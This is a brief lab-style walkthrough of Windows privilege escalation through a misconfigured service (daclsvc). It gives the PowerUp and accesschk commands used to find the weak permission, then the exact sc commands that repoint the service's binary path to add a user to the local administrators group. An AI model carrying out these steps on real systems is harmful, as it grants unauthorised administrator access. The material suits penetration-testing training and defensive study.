Binary
We tryna find a user with “SERVICE_CHANGE_CONFIG” permission
To check with PowerUp:
powershell
powershell -ep bypass
. .\PowerUp.ps1
Invoke-Result:
To check manual (Accesschk) CMD:
cd Desktop\Tools\Accesschk
accesschk64.exe -uwcv Everyone *u: makes us suppress errors
w: objects that have write access
c: displays service name for this
v: verbose (as much detail as you can give me)
Result:
So we know we can use daclsvc because it gives us that change config option with RW (read and write) permissions
Find more information about the service:
accesschk64.exe -uwcv daclsvc
We see all user groups perms. We can adjust our initial query to pull on other groups if we have a slightly privileged account that maybe has that option but not everyone!
Query the service:
sc qc daclsvc
We see the binary path to the service. Because we have Change Config permission, we can actually change the path to our executable or the command we want to run:
sc config daclsvc binpath= "net localgroup administrators user /add"Make it run:
sc start daclsvcThis might cause an error because technically the executable isn’t going to “run” but it will run the command instead.
Check that your user was added to admins:
net localgroup administrators